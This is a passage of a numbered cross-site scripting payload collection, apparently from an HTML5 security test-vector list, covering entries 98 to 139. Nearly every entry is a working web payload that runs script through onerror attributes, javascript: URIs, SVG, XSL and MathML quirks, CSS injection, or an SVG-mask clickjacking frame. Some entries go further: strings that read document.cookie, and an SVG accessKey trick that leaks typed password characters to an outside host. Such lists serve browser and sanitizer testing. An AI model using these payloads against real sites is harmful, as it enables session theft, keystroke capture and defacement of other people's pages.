120 | <div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>
121 | <script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>
122 | 
123 | <div id="99">XXX<style>
124 | 
125 | *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
126 | 
127 | <!--
128 | --><!--*{color:red}   /* all UA */
129 | 
130 | *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
131 | 
132 | </style>//["'`-->]]>]</div>
133 | <div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>
134 | <div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo">
135 | <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>
136 | </svg>//["'`-->]]>]</div>
137 | <div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>
138 | <div id="108"><!-- IE 5-8 standards mode -->
139 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>">
140 | 
141 | <!-- IE 5-9 standards mode -->
142 | <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
143 | <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div>
144 | 
145 | <div id="109"><svg xmlns="http://www.w3.org/2000/svg">
146 | <a id="x"><rect fill="white" width="1000" height="1000"/></a>
147 | <rect  fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
148 | </svg>//["'`-->]]>]</div>
149 | 
150 | <div id="110"><svg xmlns="http://www.w3.org/2000/svg">
151 | <path d="M0,0" style="marker-start:url(test4.svg#a)"/>
152 | </svg>//["'`-->]]>]</div>
153 | <div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
154 | <div id="113"><div id="x">XXX</div>
155 | <style>
156 | 
157 | #x{font-family:foo[bar;color:green;}
158 | 
159 | #y];color:red;{}
160 | 
161 | </style>//["'`-->]]>]</div>
162 | <div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>
163 | <div id="115"><!--[if]><script>alert(115)</script -->
164 | <!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div>
165 | 
166 | <div id="116"><div id="x">x</div>
167 | <xml:namespace prefix="t">
168 | <import namespace="t" implementation="#default#time2">
169 | <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div>
170 | 
171 | <div id="117"><a href="http://attacker.org">
172 |     <iframe src="http://example.org/"></iframe>
173 | </a>//["'`-->]]>]</div>
174 | 
175 | <div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');">
176 |     <h1>Drop me</h1>
177 | </div>
178 | 
179 | <iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>
180 | 
181 | <div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
182 | 
183 | <textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div>
184 | 
185 | <div id="120"><script>
186 | function makePopups(){
187 |     for (i=1;i<6;i++) {
188 |         window.open('popup.html','spam'+i,'width=50,height=50');
189 |     }
190 | }
191 | </script>
192 | 
193 | <body>
194 | <a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>
195 | 
196 | <div id="121"><html xmlns="http://www.w3.org/1999/xhtml"
197 | xmlns:svg="http://www.w3.org/2000/svg">
198 | <body style="background:gray">
199 | <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>
200 | <svg:svg>
201 | <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">
202 |     <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>
203 |     <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>
204 | </svg:mask>
205 | </svg:svg>
206 | </body>
207 | </html>//["'`-->]]>]</div>
208 | <div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>
209 | <div id="123"><span class=foo>Some text</span>
210 | <a class=bar href="http://www.example.org">www.example.org</a>
211 | 
212 | <script src="http://code.jquery.com/jquery-1.4.4.js"></script>
213 | <script>
214 | $("span.foo").click(function() {
215 | alert('foo');
216 | $("a.bar").click();
217 | });
218 | $("a.bar").click(function() {
219 | alert('bar');
220 | location="http://html5sec.org";
221 | });
222 | </script>//["'`-->]]>]</div>
223 | 
224 | <div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
225 | <script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>
226 | 
227 | <div id="125"><?xml version="1.0"?>
228 | <?xml-stylesheet type="text/xml" href="#stylesheet"?>
229 | <!DOCTYPE doc [
230 | <!ATTLIST xsl:stylesheet
231 |   id    ID    #REQUIRED>]>
232 | <svg xmlns="http://www.w3.org/2000/svg">
233 |     <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
234 |         <xsl:template match="/">
235 |             <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe>
236 |         </xsl:template>
237 |     </xsl:stylesheet>
238 |     <circle fill="red" r="40"></circle>
239 | </svg>//["'`-->]]>]</div>
240 | 
241 | <div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
242 | <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>
243 | 
244 | <div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">
245 | <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
246 | <handler id="y">alert(127)</handler>
247 | </svg>//["'`-->]]>]</div>
248 | <div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>
249 | <div id="129"><svg>
250 | <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>
251 | <!--
252 | Same effect with
253 | <image filter='...'>
254 | -->
255 | </svg>//["'`-->]]>]</div>
256 | 
257 | <div id="130"><math href="javascript:alert(130)">CLICKME</math>
258 | 
259 | <math>
260 | <!-- up to FF 13 -->
261 | <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
262 | 
263 | <!-- FF 14+ -->
264 | <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
265 | </math>//["'`-->]]>]</div>
266 | 
267 | <div id="131"><b>drag and drop one of the following strings to the drop box:</b>
268 | <br/><hr/>
269 | jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
270 | <br/><hr/>
271 | feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
272 | <br/><hr/>
273 | feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>
274 | <br/><hr/>
275 | feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
276 | <br/><hr/>
277 | <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>
278 | 
279 | <div id="132"><!doctype html>
280 | <form>
281 | <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
282 | <br>
283 | <input name="secret" type="password">
284 | </form>
285 | <!-- injection --><svg height="50px">
286 | <image xmlns:xlink="http://www.w3.org/1999/xlink">
287 | <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
288 | <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
289 | <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
290 | <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
291 | </image>
292 | </svg>//["'`-->]]>]</div>
293 | <div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>
294 | <div id="134"><xmp>
295 | <%
296 | </xmp>
297 | <img alt='%></xmp><img src=xx:x onerror=alert(134)//'>
298 | 
299 | <script>
300 | x='<%'
301 | </script> %>/
302 | alert(2)
303 | </script>
304 | 
305 | XXX
306 | <style>
307 | *['<!--']{}
308 | </style>
309 | -->{}
310 | *{color:red}</style>//["'`-->]]>]</div>
311 | 
312 | <div id="135"><?xml-stylesheet type="text/xsl" href="#" ?>
313 | <stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
314 | <template match="/">
315 | <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
316 | <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
317 | </template>
318 | </stylesheet>//["'`-->]]>]</div>
319 | 
320 | <div id="136"><form action="" method="post">
321 | <input name="username" value="admin" />
322 | <input name="password" type="password" value="secret" />
323 | <input name="injected" value="injected" dirname="password" />
324 | <input type="submit">
325 | </form>//["'`-->]]>]</div>
326 | 
327 | <div id="137"><svg>
328 | <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
329 | <circle r="400"></circle>
330 | <animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" />
331 | </a>//["'`-->]]>]</div>
332 | <div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined


--------------------------------------------------------------------------------